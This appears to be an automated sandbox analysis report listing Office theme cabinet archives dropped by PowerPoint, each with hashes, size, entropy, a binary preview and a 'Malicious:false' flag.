                                                                                                                              SHA1:6B89CCC79D98A96AB00D045E2CF5FD495CB03193
                                                                                                                              SHA-256:1D9C6C49026503E16D584633211DF49B82191F3988F466C7F12D29C8AE5E4E4B
                                                                                                                              SHA-512:3E5197D4F1A24BC903DBF8A0CD3CA9EFB6CBFE725C31EEA454EA1B4D355229E55B4F51F3B13BFB24D32BB6DA6F85B7CB6E31289AD8DE6C9C9F1C4C1491AFB9D2
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF....i.......D................G..........i...P?..........{.......2..........J.. .Atlas.thmx.....2......J.. .content.inf....p..[.....P.........&......U...U5.U.T....jP......5....hf.h................g.......s....Mx....Hg...BH.u.%.Q..4i...*.4T.RV.C.b[.F..m..P:.d....xT$.,...............(..{...f.e0..l$ba"..../... N..a~....GyD?..A@|...... ....R.H.....?IL@...P..{...\......Y.21..K.-....D......J../.yj.w..5....=<M.SkB..\w..0.}...>u...m.+ O.{....+....q..:}.=.X.=H...<.~T.kE.-.z..r...7...R\Pad..+r..VW).....t.kje..~Mf.SK+v..........*....o8..<.q...p..4.%K]......:Z.T............V.h.l...._G..m.tl8R....Ma.....l..W0y........U.....Y`.....b.I......cz(u2..\..G.....F.zU..$T.v....HAdN.yo..r...{...j.....]...LM.|.I..ajr..[%..u.Go5vwK..Vod$.)..*...3...)....;1....'?.@.[N.c...b.%S.....ea.svj......I.b.x.....q.i....9o...#.lb.9x..4...b.{iU.N.B...sU.Y.*.....;uXY....1....&.(.........?.v...~...)....j~..}...F..v..Q..w}..i.ci.....|.{......../552......H......k.....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 624532 bytes, 2 files, at 0x44 +A "content.inf" +A "Quotable.thmx", flags 0x4, ID 13510, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):640684
                                                                                                                              Entropy (8bit):7.99860205353102
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:12288:eV7ivfl+kbkIrWu+2aoRjwv/cSUWauGPo2v65s4QqcT3ZCCz6CSj8aC:fdhr1+3y4MWaC2CO4V+3ZCCDsO
                                                                                                                              MD5:F93364EEC6C4FFA5768DE545A2C34F07
                                                                                                                              SHA1:166398552F6B7F4509732E148F93E207DD60420B
                                                                                                                              SHA-256:296B915148B29751E68687AE37D3FAFD9FFDDF458C48EB059A964D8F2291E899
                                                                                                                              SHA-512:4F0965B4C5F543B857D9A44C7A125DDD3E8B74837A0FDD80C1FDC841BF22FC4CE4ADB83ACA8AA65A64F8AE6D764FA7B45B58556F44CFCE92BFAC43762A3BC5F4
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF............D................4...............?..........~..................M. .content.inf."..........M. .Quotable.thmx..^.u.n..[...............&...U..F.......UU.M.T5.UUQS..j..#>43fD.....`....Vr......19'...P..j.-...6n.0c....4$.c....$.4.k3aQ$.lCN.#.[.."qc....,Z...,Qt@!.@...... ...H.......9.9.y.{....[.`..s3.5.....B....W.g.d...[uv.UW..............P.8.(.?......3.....'/F...0...8.P. .O..B....K...g..L.......#s...%..|4.i....?.3b.".....g...?.........2.O23..'..O~.+..{...C.n.L......3......Y.L...?K...o......g....@.]...T..sU.....<.._.<G.......Tu.U2..v.&..<..^..e.].cY;..9.%..}...I.y.;...WM...3>.:.=.|.-.AtT2OJ.I.#...#.y....A....\]$r...lM.%5.."...+7M..J.....c...".&$.... Y.r.B;..81B. +H...b....@7K.*.F.Z...v..=..ES.f.~.."...f..ho.X.E.a`~*...C>.&..@\.[....(.....h..]...9&...sd.H .1.x.2..t.rj..o..A..^qF.S9.5.....E.{...C|.w.c/V...0Q.M...........O.7;A4u...R..Z.B.7a.C`....p.z.....f!|.u.3t....2e.wWH..'7p....E_...e.._;..k....*&E.^.f=V..{*..al.y:.4a...+.g...-..>e
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 682092 bytes, 2 files, at 0x44 +A "Berlin.thmx" +A "content.inf", flags 0x4, ID 46672, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):698244
                                                                                                                              Entropy (8bit):7.997838239368002
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:12288:bUfKzAwwP7XAMWtr4FvMRt4lX0hnBdThiSb32+TdysrQgn7v4EemC6:sr7AMkJ34xu1bm4ZrQaY6
                                                                                                                              MD5:E29CE2663A56A1444EAA3732FFB82940
                                                                                                                              SHA1:767A14B51BE74D443B5A3FEFF4D870C61CB76501
                                                                                                                              SHA-256:3732EB6166945DB2BF792DA04199B5C4A0FB3C96621ECBFDEAF2EA1699BA88EE
                                                                                                                              SHA-512:6BC420F3A69E03D01A955570DC0656C83C9E842C99CF7B429122E612E1E54875C61063843D8A24DB7EC2035626F02DDABF6D84FC3902184C1EFF3583DBB4D3D8
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF....lh......D...............P...........lh...?..........|..................M. .Berlin.thmx............M. .content.inf..lH.lj..[...............7.I..)........P..5x.B/^y5.xk^^......D.F........s....y...?D.....*.....&....".o..pl..Q.jm?_...6......=%.p.{.)S..y...$......,4..>#.........)..."-....K....4.E...L=.......4..p.c..nQ.0..ZO.#.....e.N..`U......oS....V..X[t.E)|.h..R....$..}.{.F.7....^.....w.,...5rBR.....{.......mi...h.b......w+..;.hV......q..(.7&.Z.l...C."j........[-E4h.....v&..~.p$|\X...8.....Fj'%,.)6w...u|C..,y..E..`*Up../(....2.(....Z.....,.'...d..s..Z....5.g.?Nq..04...f...D.x....q+.b.."v`{.NL....C..... ..n......1N+.I.{W9....2r.0...BaC.....O..=...k..."..8.D\jK.B...Aj....6,B..2...I.. B..^.4..1.K+.....DP...Mr....9..x[...>........?.Zd..'._2.._..>..'.F..#.w...2..~.|........q_Wy.W.....~..Qex.km/..f......t.q..p..gm.|.x.... ,.#\Z....p....a.}...%..v.J.Es......I.b.P?...0......F.x....E..j..6.%..E..-O.k...b .^.h.Cv...Z....D.n.d:.d.F..x...[1...B..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 1049713 bytes, 2 files, at 0x44 +A "content.inf" +A "Savon.thmx", flags 0x4, ID 60609, number 1, extra bytes 20 in head, 37 datablocks, 0x1503 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1065873
                                                                                                                              Entropy (8bit):7.998277814657051
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:24576:qehtHA3nsAOx7yN7THwxdGpkw8R60aTcua5U4c:hhmnsBMNAxdGpV5za5Uv
                                                                                                                              MD5:E1101CCA6E3FEDB28B57AF4C41B50D37
                                                                                                                              SHA1:990421B1D858B756E6695B004B26CDCCAE478C23
                                                                                                                              SHA-256:69B2675E47917A9469F771D0C634BD62B2DFA0F5D4AF3FD7AFE9196BF889C19E
                                                                                                                              SHA-512:B1EDEA65B6D0705A298BFF85FC894A11C1F86B43FAC3C2149D0BD4A13EDCD744AF337957CBC21A33AB7A948C11EA9F389F3A896B6B1423A504E7028C71300C44
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF....q.......D...........................q... ?..........{...%..............M. .content.inf.Q_.........M. .Savon.thmx...O>.o..[..............&.5....UUcC.C....A...`TU...F....".54.E.....g.-.7-D....1g...p.6......@..w(....h'?.....(..........p..J.2n$4.........A......?...........@.C.W.R.5X..:..*..I..?....r.y..~!.....!.A.a...!........O.........5.x<C...?.?....C.C.......'....F../....../.$................4.7...................P...(.w.}6.........7.....01.1r........._..?.............'.._..JOx.CFA<.........*0..2.?...>F.../...;..6-8..4...8&yb....".1%..v'..N...x......}.gYb..~L.....f[..!......Y.G.....p..r...?.p...F.Vy.....o.Whll...+...M.V...:.]...B.%.H....n..@.].zaVxf...y{.@....V.t.W....$Kp-.....7W.J..h..0A3mK.=.ub..R...W......*'T2..G#G,.^..T..XZu...U. ...76.d..#.I.JB.v...d...%.....6..O.K.[.:.L.\.....1.D..2a.>f......X...b5...ZgN.u.f...a!..."...sx....>..?.a.3.8.^._q..JS1.E..9..Lg.n.+....lE.f:j.9)Q..H1=..<.R.......{c>:.p[..S.9h.a.gL.U....8.z..z.!.....2I.~.b..2..c...
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 937309 bytes, 2 files, at 0x44 +A "content.inf" +A "Gallery.thmx", flags 0x4, ID 44349, number 1, extra bytes 20 in head, 34 datablocks, 0x1503 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):953453
                                                                                                                              Entropy (8bit):7.99899040756787
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:24576:9B1Onw3vg7aeYPagzbJ5Vhv6LnV2Dhl7GEYqVjcyd:vww3o7BYPJbJ5Vh6UCqZfd
                                                                                                                              MD5:D4EAC009E9E7B64B8B001AE82B8102FA
                                                                                                                              SHA1:D8D166494D5813DB20EA1231DA4B1F8A9B312119
                                                                                                                              SHA-256:8B0631DA4DC79E036251379A0A68C3BA977F14BCC797BA0EB9692F8BB90DDB4D
                                                                                                                              SHA-512:561653F9920661027D006E7DEF7FB27DE23B934E4860E0DF78C97D183B7CEBD9DCE0D395E2018EEF1C02FC6818A179A661E18A2C26C4180AFEE5EF4F9C9C6035
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF....]M......D...............=...........]M...?..........}..."..............Li. .content.inf............Li. .Gallery.thmx.].(.Vq..[.....0Y..........v.....w.wwwww.wwwwww.w.....".83....y8..mg...o*..U..N(..@uD.:O<........{.G....~~.....c.c.5..6./|G .@#1O.B.............PT@...b.d.~..U....B.{.........0.H.....`.H.`..'S.......Ic..W..x...z....... .........g......._....o......S......p...$....._........._...K......x..?.6.U~...'./.r.................../.......5.8..2........2b.@j ....0.........``....H... ,5...........X........|..Y.QoiW..*|.......x.sO8...Yb....7...m..b.f.hv..b......=...:Ar.-...[..A\.D..g..u....].9..M...'.R-`.....<..+.....]...1.^..I.z..W{.._....L.. ...4;..6O.....9,.-.Vt+b/$7..}.O05.Y...-..S.....$*.....1."Z.r;.!..E.mMN..s .U...P%.[.P...cU...j...h.d.../.s..N/..:..X*...p5.7\}h.Q ..._.F.X.C..z$.nV..+.k..|.@.L...&.........^#.G.a..x..w!wx.8e+..E. i..$?9..8...:......|..[."..y..&y..?...W....s..._...3Z0c.....i.q.........1c.jI....W..^%xH.._...n.......&J..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 1072808 bytes, 2 files, at 0x44 +A "content.inf" +A "Retrospect.thmx", flags 0x4, ID 59128, number 1, extra bytes 20 in head, 50 datablocks, 0x1503 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1088984
                                                                                                                              Entropy (8bit):7.9927994027199425
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:24576:h2WZfFbGSoB3Pf/u/V1HTysuGrieyhhwSvxqi6Spqsgx:h2WZfF6NB3XM1z9rALvOS6x
                                                                                                                              MD5:C4AF49F2FBC299AE7D3B8285BC0890C9
                                                                                                                              SHA1:BB302051A8E305DFB910AC26D23A67A805C3893C
                                                                                                                              SHA-256:30AEC7F9ECDAD690A2CB38BA6A2E07C8158175140B76F17AAE7D828A42A727A7
                                                                                                                              SHA-512:8402A0C75FC6AFD3B6C86794C5F7EAE0B78475989C6B556C89C762F9F312F0F58878C008D0A9CEF28EFFE341F4CF9192EE197575FAA3DA3B1D2189878C13ABF8
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF.....^......D............................^..0?..............2..............M.. .content.inf............M.. .Retrospect.thmx.Z..,\..[...............#..0.j.`TU53..U.UU56QS..P.......}"NDCfF.....`.*e3. ...E.....p.....6,.7P...m..!..<.....WKDh.{...<.(&o.F....6AC...D.Tp6o.....#<C\.............A.6.\.[tNX...........jK...O.=.;...............A...?......4.-$....3.@..&....74A6.5..........br.............&...K.`...)....................$..q....sq..w...C............3......co.|..H.sOn.....9_.......33...~......._....h...`..`.o.0.....rTD.$'...A...d.........V.\.....=1Ocj.y.$G..IN.....Y.,.._U..Ul....b.e......%..?."tm>.hE..hM....(.gI.b.G....?..5."A.?.[.3C.7K...B...l-].I._.VJz.V.<z..v.{z.H%.."yg....!_.BUsc.O..7.!y..A.......W....uB.................e.y...N.>.v..".u.?....v5......n.`mja....i.....zwRC..-^.|\.....a..P.(......2.f.J....-...g.f ..O....b.C..A.....f...S....:..@._E=..]C....I......=..-\...]...u..d0...2._..|B&...(......-.y.y7.O..K4.r.t?.6._...e..f.e..G.U......n3.8....g
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 1081343 bytes, 2 files, at 0x44 +A "Circuit.thmx" +A "content.inf", flags 0x4, ID 11309, number 1, extra bytes 20 in head, 45 datablocks, 0x1503 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1097591
                                                                                                                              Entropy (8bit):7.99825462915052
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:24576:UE9BMy98gA4cDWHkSrDans3MfEE6w8OaVuCibol0j41dwD:UE9Bdy3D4keQWt7w85VuVoaj4/Q
                                                                                                                              MD5:BF95E967E7D1CEC8EFE426BC0127D3DE
                                                                                                                              SHA1:BA44C5500A36D748A9A60A23DB47116D37FD61BC
                                                                                                                              SHA-256:4C3B008E0EB10A722D8FEDB325BFB97EDAA609B1E901295F224DD4CB4DF5FC26
                                                                                                                              SHA-512:0697E394ABAC429B00C3A4F8DB9F509E5D45FF91F3C2AF2C2A330D465825F058778C06B129865B6107A0731762AD73777389BB0E319B53E6B28C363232FA2CE8
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF............D...............-,..............x?..........}...-...RU.........M. .Circuit.thmx.....RU.....M. .content.inf.g...&|..[......=..R.....=.*,.!QA?h..Q.!....Uk!.HJ.......VKuk.....q.w.w.U.....;...K.@.URA..0..B..|rv.ND(.`{..@.1.}...s?.....-...O.(V.w..1..a.....aW...a.Z..aX....5.I...!..........(. ./.d...me.( ..f.........w.......Xp.s....c..vB.98.....C.J......V ..ML.M...B.n.>...|....u!.5@t..q4....(K...u qL.S....>/%v%.2..TF.].e..'..-..L.N..c].a..(WU\o.%^..;...|o.6..L..[..;&....^p.Lu.sr,-.R=.:.8.>VOB...:.?$.*h.o....Zh.h....`.B.c.../K......b^...;2..bY.[.V.Q8....@..V7....I0c.cQN7..I.p..}..!..M....1K....+....9.2......a..W.V..........;.J .i......]%O.-......CeQ.0.c....MbP3.0.w..8w..Y...|...H;#.J.+M......>.`y..aWk|.i.BF.pJv;.....S..6....F.....RLG~..........J.=......"..........H.....h..o...u........M.6F?.F.p.B.>./*l....J.R..#P.....K......<iu..gm^..n...#c..zO"7M.O......4'>A..(.E.Cy.N.)....6.tx.r[.....7.......m.t..E?.....5.5.6.\..{.V.T.D.j..=~a^.I
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 1377563 bytes, 2 files, at 0x44 +A "content.inf" +A "Ion_Boardroom.thmx", flags 0x4, ID 26781, number 1, extra bytes 20 in head, 49 datablocks, 0x1503 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1393811
                                                                                                                              Entropy (8bit):7.998039489696127
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:24576:pI4ga3jIAemcNjI7L6+iXZ4vI+arjU/QxJMT+wBeXTKgd:Rga9JcNM7L6+oZiyU/Q7G+KeXTKgd
                                                                                                                              MD5:0F56B43D83616D6A60134BF50F9E684E
                                                                                                                              SHA1:2DBCBDC795F5FB637D73099F27C5BE2B6103C060
                                                                                                                              SHA-256:9F4CD66A196D3874BA6BC74F9320F4EADDE09586DCB0AE00ADF0A56EC3EEE5F4
                                                                                                                              SHA-512:776F63994648A96C763E883D318B2889E7A3A32C21BAE8E001CDB9E8F8E2C434939C3BFA221956A715DA206BFB9FC837DEBED2EEE532A59523D783F6865BDF75
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF............D................h..............x?..............1...$..........M. .content.inf.~R..$......M. .Ion_Boardroom.thmx.f...<l..[...................]...............p..]....XQ....;X...sQT-(`>N....#.@..w..6@.....;.!{@YP.........(..C...!M...(8.a. .e..24...R.,.x.........."."....DU$..3...]...{....Tr]W....`.........h.0............{.T........#.6.....?.........X...@.........o..6.../?.....Q...p.....p...c.../.2....H?.`.r...........<C...P.W..6..$V..~0..f.....%.;....(_.g..4......o./.......&..._....&.......<..~.K.g..6.H..HX.lAqk.b...k..cNS.l\3.......L,.y.3%,..,.....mx.?...3.........#kFR..33g.....B~l.#........'W.Y.c..4.^...yWo.f....+.Q.|....'-P..|e.')..+.UVL.......+...b..2B.E..*.-.....M..x.Sw.>..}+v.[S.......2.K...~...&Q{F.s.C..`-....[...Y...3/.........%..T.m...V.h.EU....W..2.......osEC......5.9.C....2.i-...|..4.H...=An/.w.L\s..o.o.@c.g..0r.U`K.4.H.....U.K.1.................R..p..*~.=>......I.!f..6...T./.3..s9D.yu/..O.Q..M.U1t..&.km.w..m/.Q.<G..R..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 1291243 bytes, 2 files, at 0x44 +A "content.inf" +A "Droplet.thmx", flags 0x4, ID 47417, number 1, extra bytes 20 in head, 54 datablocks, 0x1503 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1310275
                                                                                                                              Entropy (8bit):7.9985829899274385
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:24576:NN3M9UHpHZE4aubaPubP3M6d71FdtmFAjq+54/79LVzG+VnS:NN3M9UJHZE4abPyU4JtmFCq+q/7JlVS
                                                                                                                              MD5:9C9F49A47222C18025CC25575337A965
                                                                                                                              SHA1:E42EDB33471D7C1752DCC42C06DD3F9FDA8B25F0
                                                                                                                              SHA-256:ADA7EFF0676D9CCE1935D5485F3DDE35C594D343658FB1DA42CB5A48FC3FC16A
                                                                                                                              SHA-512:9FDCBAB988CBE97BFD931B727D31BA6B8ECF795D0679A714B9AFBC2C26E7DCF529E7A51289C7A1AE7EF04F4A923C2D7966D5AF7C0BC766DCD0FCA90251576794
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF...........D...............9..............XJ..........}...6..............M.. .content.inf............M.. .Droplet.thmx..m7.>J..[...............2.QQPIj.*.."o^R.H5*^...^(e.W...R..x..^`..m...."..+.....{o.......Q.-....$V.N>...T]..L.... ..N.h..dOY.......S......N.%.d..d....Y.....e..$...<.m...`............@....=.z..n..[...,G..1Fn.qPDH{C<...3.Q...2..r..*...E.E.E.ErM"&a..'..W....:...?I..<.I..6o.`.d.?!..!..._.4\.._.E..).._O.S....; ..#..p.H.....c....o\.K..?$U.e.........!...J.v.....gNe._..[....#A.O.n_.....gm:P._.........{@..-g..j.69b.NH.I.$Hk?.6.n...@......'.C.._.U..:*,j.-G.....e.#.Sr.t.L......d[.[...s.....rx.3.F[.5o..:....K*.x..)M.fb...3IP.&h.Q.VX^%U.......x..l......@6.k.P..zSW.?....F..[L...4..b.l.w."&.....`.j...i.5}".~.-.....{\.:...o.'H\*+)....3.Y......\...f:.;....e........4't7..f...w..j...3....N..9`.J...P..?.....=3_.y]...f.<.......JM5.}Q/ .F.a..Z.._yh......V..>m .......a....f....!.hz..\.....F_..'z...,....h.=.......=.o..T....3.e..........$..g.2.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 1593091 bytes, 2 files, at 0x44 +A "content.inf" +A "myTemplate_02836342.thmx", flags 0x4, ID 49870, number 1, extra bytes 20 in head, 56 datablocks, 0x1503 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1609163
                                                                                                                              Entropy (8bit):7.9984205861574775
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:24576:lAqpS8Oo3NP518YJ7quri1kR0BnuLtBz1GS1fB9z29q4Gdu7BR/jKg5rp:lAWAGNPLJ7qugk6o3AlGdcR/jjrp
                                                                                                                              MD5:EBCF724F8885692BB8E2EE2406AADC02
                                                                                                                              SHA1:73B0B931B5D05C2A4B490925E2A54E4A7DEEBA36
                                                                                                                              SHA-256:80ADC8C9EDE235AD8CD45EEACE2F40227ABA01D9FEF261756F4A4C44EAFB146B
                                                                                                                              SHA-512:71FCC0E5CF084F673C805EC51DFC68C4B93E85E7D593449E6F9732CAEC32F004F24300A251BA8CBABF1774DBF732FDCB9CFB164B3A77CA0CAD14C2825B78EE68
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF.....O......D............................O...>..............8...0..........N.. .content.inf.....0......N.. .myTemplate_02836342.thmx.y.5.|z..[..... b..RP....E..(*.5..J I1.I.P.j...t].mT...2]...k..."...0f....H.h..........F..\.....'D....2...m..&.A...g....Y..".}...t......!.B$..;..(D...F...*....(...............@.?.Hj....T.............Mr.........5..E?G&.....?........M....N.........4....p......$...?.5.y.........8.a....#.....+...q....#..E....?2..u........hw.Y..............q.....................j.t......hS.m..?...._.s....k.....j.n.o."..5.44......q.up.g.X..U......kp.S..4....0..0{.(D..d.X|...#s&7.........M?.Rv-9.~....bvd. .p.C.B..V.f..;.8V..g..e.#f.._f.......`F.....#!.",[.B.7..$....-j.......kO..a..QG<B...2./.>...|..\.+J..x....(.....v.+.:PfO.;..T..Zo<.......]..3..C....LW.0:..8....+....P.k.r.._........PC.......J$...N5.a._g..Zw..!!'5....W.v.....r.gO..&6..w....Cc)..H.7.;...WCXu..j%..0......x...mEo.._8.^....+.h._W...z.3.+s..[..9.cV...\l}wLc3i.Q.3.M....x
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 1750009 bytes, 2 files, at 0x44 +A "content.inf" +A "Slate.thmx", flags 0x4, ID 28969, number 1, extra bytes 20 in head, 72 datablocks, 0x1503 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1766185
                                                                                                                              Entropy (8bit):7.9991290831091115
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:24576:O/gjMj+RP9Q07h9F75a0BXjBccHMVk2Hq2SkGa0QglyZtxmdPP2LcSUtfgfp16Yx:kJ6RP9Q07/X5V7yVF0QgktxAPutUt0zP
                                                                                                                              MD5:828F96031F40BF8EBCB5E52AAEEB7E4C
                                                                                                                              SHA1:CACC32738A0A66C8FE51A81ED8E27A6F82E69EB2
                                                                                                                              SHA-256:640AD075B555D4A2143F909EAFD91F54076F5DDE42A2B11CD897BC564B5D7FF7
                                                                                                                              SHA-512:61F6355FF4D984931E79624394CCCA217054AE0F61B9AF1A1EDED5ACCA3D6FEF8940E338C313BE63FC766E6E7161CAFA0C8AE44AD4E0BE26C22FF17E2E6ABAF7
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF............D...............)q..............0?..........{...H..............M.. .content.inf.;.#........M.. .Slate.thmx.p.+..P..[......U..............p..K.!.......*...K..w..v........=....D$r...B....6 ...X.F0..d..m.s...$$r........m.)6.m3....vXn.l..o...a...V......Ru.:=2M.........T.....4S`EP......\..r,..v...G.P......'._H0]..%_............X.P.,.............H.?.-.H..".......M..&..o....R........<......`...D.H.._.G.Qv..(.*.U,.9..D...."..T..i.e../.e.."....,S...o.X.....c./..V....Z..o.O..2....{...+... ....0.@J.R.Q.m.....{.....h?u.q.O{...l.d)..Yk`.....#...u.-.m..#CXwrz4..7.>......v.E:.#.oGSKS.TX.Chm.4aQ......avH..{..j+@6[k].....`c..W8..j.v.Zh.]....4......K..#Hzyd..K}.....H|<H..\(l...+..%Z......~.S:^..d>..1..H%..7N-v.....Wu.*..b^.B.....k0gc.2.{.!...E7.}3.d...{.Ye...&#f6...:2......v..&!..k0d.p.b...,..$.....Y..60...h.N}.r...<[./........{...Es..&.nf.....2.@Fh3.9.G....l.[.C..SD/6.H.K....}..m....M..........gl.P.]..I......5....e.c...V....P...[.=.......O.eq+
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 2042491 bytes, 2 files, at 0x44 +A "content.inf" +A "Depth.thmx", flags 0x4, ID 63414, number 1, extra bytes 20 in head, 72 datablocks, 0x1503 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2058715
                                                                                                                              Entropy (8bit):7.997107658057165
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:49152:5IgXLOTa1MKe/VpMDaIWRzU3lLqvaF1buL7rNQVxE:WgXaMMrViuIWtUkvGoHr+W
                                                                                                                              MD5:A6DE20BA06CD7C8AAB98F8C03BBD49F7
                                                                                                                              SHA1:CEDA0FE1EEA124EADC13606B5624373B922D24EA
                                                                                                                              SHA-256:AD50810112E08B981E967A5984DAB3DA6C4AAA890316BA38D44F39D80CCBB4E6
                                                                                                                              SHA-512:54FC0A7C2BEB082677882E0BC128CD77F13CC8E3C3C286056DB2D5FDC608865ADD3C3FDC4A8AFFD120E3A98128BC15FCE7FE7D90121A5462A66F8FCA0F93AABA
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF....{*......D...........................{*..`?..........{...H..............Mn. .content.inf..#........Mn. .Depth.thmx...8.hx..[.....@8....@...=.R.I.:...-..a$IA*.a...Z).D(....u...$Z..G;Nkw.7F...........v.+.L@..":..A.mb.......u.@......`r..+........N...j..>...j}.....bG^.I!.W$C/@X..............j.H.... .1.).....9........ii6..:.m_.X.u.?.47.i...+mx...&:.7n....M...."~...m....f..oD.....\l..9N..w.2...9...4...:..6....k..?L.....'.....y....gY3....__9..~t.......3m.u.......~......f.......O....K....r:u..Y....-.H.w.].^]M...F.oz.........~.3....#fk.E@.R....z...yC.6............"..._..i:<S.?.@.z.Y....*..-..?...t..b.. ....m..9l.7.....(..w.....V.G4..Kf.$f).....ym..4sk.,..c.........j=...f.n.F...r.*C..=#.....+..?../C...t2..v;H{. F..V.u....:(....\...r$Y.q.&o. .1..q.`w......-..I.......~.+.d./.[w(...u..Y...I]..H...xI...?....dE....{.C.[z.....L...#..~......e.......]..l: .; ....8.P.9B....d.o.9\r....V.[BpW...u..|...e|e...{.x.}.tz..N<G(...N9.._|..a.?.....E.Ck..u../v3...N?.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 1865728 bytes, 2 files, at 0x44 +A "content.inf" +A "Damask.thmx", flags 0x4, ID 63852, number 1, extra bytes 20 in head, 68 datablocks, 0x1503 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1881952
                                                                                                                              Entropy (8bit):7.999066394602922
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:49152:6Wp9u/ZAvKz7ZFCejPiSmYXKIr6kBwBUA:6W6Bn7ZFNiiKo2l
                                                                                                                              MD5:53C5F45B22E133B28D4BD3B5A350FDBD
                                                                                                                              SHA1:D180CFB1438D27F76E1919DA3E84F307CB83434F
                                                                                                                              SHA-256:8AF4C7CAC47D2B9C7ADEADF276EDAE830B4CC5FFE7E765E3C3D7B3FADCB5F273
                                                                                                                              SHA-512:46AD3DA58C63CA62FCFC4FAF9A7B5B320F4898A1E84EEF4DE16E0C0843BAFE078982FC9F78C5AC6511740B35382400B5F7AC3AE99BB52E32AD9639437DB481D1
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF.....x......D...............l............x..`?..........|...D..............M[. .content.inf...!........M[. .Damask.thmx...o.PI..[.............../.TU.jj0..3jCUPU.jF...m.UU.P}.....PU..*........w..#....E..].................A.. w.$..@..'g.......6%:..r9..d.M;M+.r.8[d{.s..dh..(P..........!.. ..ne..f.Nc..#..Y..q....KB}..b].@..F.&.t....E.........@&.m......$w......q...:.H....p.p.....?.9x.. .....?...ao....I....................o......g.u..;."....O;....{..(k..._.w/.Z......Jb..P.O?...........?....F....ty..72......! #....v..J......?.....!,.5.7..Em.....is.h.. \.H*)i1v..zwp.....P.....x].X{O//..\....Z>z....6...+..a.c...;.K..+...?014..p.w%o^.....]...MguF...`....r.S.......eF..):.dnk#.p{..<..{..Ym...>...H......x.}.hI..M....e......*G.&.?..~.~G6.....+...D..p...._...T....F6.[Cx./Q..Xe.>.;.}>.^..:..SB.X..2.......(A..&j9....\\.......Haf+]Y...$t^Y=........><.w....tL../E...%6.Vr~MI...l.....<.0.I....7.Q8y.f.uu...I.p..O..eYYS.O......9..Qo.......:..........o.............{
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 2511552 bytes, 2 files, at 0x44 +A "content.inf" +A "Main_Event.thmx", flags 0x4, ID 59889, number 1, extra bytes 20 in head, 90 datablocks, 0x1503 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2527736
                                                                                                                              Entropy (8bit):7.992272975565323
                                                                                                                              Encrypted:true
